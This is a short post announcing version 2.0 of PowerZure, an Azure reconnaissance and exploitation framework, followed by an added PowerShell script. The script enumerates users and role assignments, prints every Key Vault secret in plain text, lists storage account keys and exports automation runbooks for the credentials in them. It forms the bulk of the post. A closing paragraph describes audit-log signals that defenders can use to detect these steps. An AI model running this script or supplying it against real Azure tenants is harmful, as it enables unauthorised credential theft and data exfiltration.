PowerZure, an exploitation framework targeting Azure, has been updated

PowerZure is a framework designed to perform reconnaissance and exploitation of the Azure cloud platform, Azure Active Directory, and associated resources.

The project [1] is maintained by Ryan Hausknecht, who recently released version 2.0 of the framework. The tool now provides the following attack components and functions:

  • Operational functions with backdoor/payload creation and execution
  • Information gathering on users, groups, applications, and resources
  • Credential dumping of key vault secrets, applications, certificates, and automation accounts
  • Data exfiltration of storage accounts, account keys, runbooks, storage containers, file shares, and virtual machine disk contents
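As an added example (not PowerZure's own code), the same reconnaissance and credential-harvesting steps the list above describes can be performed by hand with the official Az PowerShell module. It assumes an already authenticated session (`Connect-AzAccount`) whose identity holds Reader, Key Vault secret-read and storage `listKeys` permissions; the output folder and the `-First 20` limits are arbitrary choices for the example.

```powershell
# Added example, not taken from PowerZure: manual recon and credential dumping
# with the Az module. Requires: Install-Module Az ; Connect-AzAccount
# Assumes the session identity can read Key Vault secrets and list storage keys.

# --- Recon: who am I, which subscriptions can I see? ---
$ctx = Get-AzContext
"Running as {0} in tenant {1}" -f $ctx.Account.Id, $ctx.Tenant.Id
Get-AzSubscription | Select-Object Name, Id, State

# --- Information gathering: users, groups, applications, role assignments ---
Get-AzADUser        | Select-Object DisplayName, UserPrincipalName | Select-Object -First 20
Get-AzADGroup       | Select-Object DisplayName, Id                | Select-Object -First 20
Get-AzADApplication | Select-Object DisplayName, AppId             | Select-Object -First 20
# Role assignments show which identities are worth targeting next
Get-AzRoleAssignment | Select-Object DisplayName, RoleDefinitionName, Scope

# --- Credential dumping: Key Vault secrets ---
foreach ($kv in Get-AzKeyVault) {
    foreach ($s in Get-AzKeyVaultSecret -VaultName $kv.VaultName) {
        # -AsPlainText needs Az.KeyVault 2.x; older versions return a SecureString
        $value = Get-AzKeyVaultSecret -VaultName $kv.VaultName -Name $s.Name -AsPlainText
        [pscustomobject]@{ Vault = $kv.VaultName; Secret = $s.Name; Value = $value }
    }
}

# --- Credential dumping: storage account keys (full data-plane access) ---
foreach ($sa in Get-AzStorageAccount) {
    Get-AzStorageAccountKey -ResourceGroupName $sa.ResourceGroupName -Name $sa.StorageAccountName |
        Select-Object @{ n = 'Account'; e = { $sa.StorageAccountName } }, KeyName, Value
}

# --- Data exfiltration: automation runbooks frequently embed credentials ---
$outDir = Join-Path $env:TEMP 'runbooks'   # arbitrary output folder for the example
New-Item -ItemType Directory -Path $outDir -Force | Out-Null
foreach ($aa in Get-AzAutomationAccount) {
    Get-AzAutomationRunbook -ResourceGroupName $aa.ResourceGroupName `
        -AutomationAccountName $aa.AutomationAccountName |
        ForEach-Object {
            Export-AzAutomationRunbook -ResourceGroupName $aa.ResourceGroupName `
                -AutomationAccountName $aa.AutomationAccountName `
                -Name $_.Name -OutputFolder $outDir -Force
        }
}
```

For defenders, none of these steps is silent: secret reads show up as `SecretGet` audit events in Key Vault diagnostic logs, and key listing is recorded in the Azure Activity Log as the `Microsoft.Storage/storageAccounts/listKeys/action` operation, so an identity enumerating every vault and storage account in a subscription in a short window is a usable detection signal regardless of whether PowerZure or the plain Az module is used.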

References

  1. https://github.com/hausec/PowerZure
